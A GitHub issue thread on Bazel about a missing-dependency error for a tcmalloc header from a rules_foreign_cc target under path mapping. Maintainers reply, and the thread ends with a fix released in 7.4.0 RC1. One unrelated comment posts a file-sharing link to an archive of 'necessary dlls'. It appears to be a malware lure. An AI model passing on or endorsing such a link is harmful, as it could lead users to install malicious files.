### ISSUE TITLE
Missing dependency declaration with path mapping

### ISSUE THREAD

**Issue by fmeum** [bazelbuild/bazel#23681]
I was testing this out with https://github.com/bazelbuild/bazel/pull/23630 applied, I got pretty far but I hit this issue:

```
ERROR: AsyncRT/BUILD.bazel:138:23: Compiling AsyncRT/lib/Runtime/Globals/Globals.cpp failed: undeclared inclusion(s) in rule '//AsyncRT:RuntimeGlobals.static':
this rule is missing dependency declarations for the following files included by 'AsyncRT/lib/Runtime/Globals/Globals.cpp':
  'bazel-out/cfg/bin/external/gperftools/tcmalloc/include/gperftools/tcmalloc.h'
```

Where the header here is from a rules_foreign_cc target:

```
configure_make(
    name = "tcmalloc",
    autogen = True,
    configure_in_place = True,
    configure_options = [
        "--enable-shared=no",
    ],
    copts = [
        "-fPIC",
        "-w",
        "-fexceptions",  # Needed for tests, which ideally we wouldn't build
        "-Wno-register",
    ],
    lib_source = ":all_srcs",
    out_static_libs = ["libtcmalloc_minimal.a"],
    target_compatible_with = select({
        "@platforms//os:linux": [],
        "//conditions:default": ["@platforms//:incompatible"],
    }),
    visibility = ["//visibility:public"],
)
```

It might be relevant that I access it through an alias (although removing that doesn't help):

```
alias(
    name = "tcmalloc",
    actual = select({
        "@platforms//os:macos": "@gperftools-macos//:tcmalloc",
        "@platforms//os:linux": "@gperftools//:tcmalloc",
    }),
)
```

Are you tracking this one?

_Originally posted by @keith in https://github.com/bazelbuild/bazel/discussions/22658#discussioncomment-10687282_

**Comment by websquadpro** [comment]
download
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive

**Comment by fmeum** [comment]
@keith I added integration test coverage for headers from an external repo, but everything works there. Could you try to build a reproducer for me?

**Comment by nikhilkalige** [comment]
This may be of help https://github.com/bazelbuild/bazel/issues/21718#issuecomment-2364720393

**Comment by iancha1992** [comment]
A fix for this issue has been included in [Bazel 7.4.0 RC1](https://github.com/bazelbuild/bazel/releases/tag/7.4.0rc1). Please test out the release candidate and report any issues as soon as possible.
If you're using Bazelisk, you can point to the latest RC by setting `USE_BAZEL_VERSION=7.4.0rc1`. Thanks!
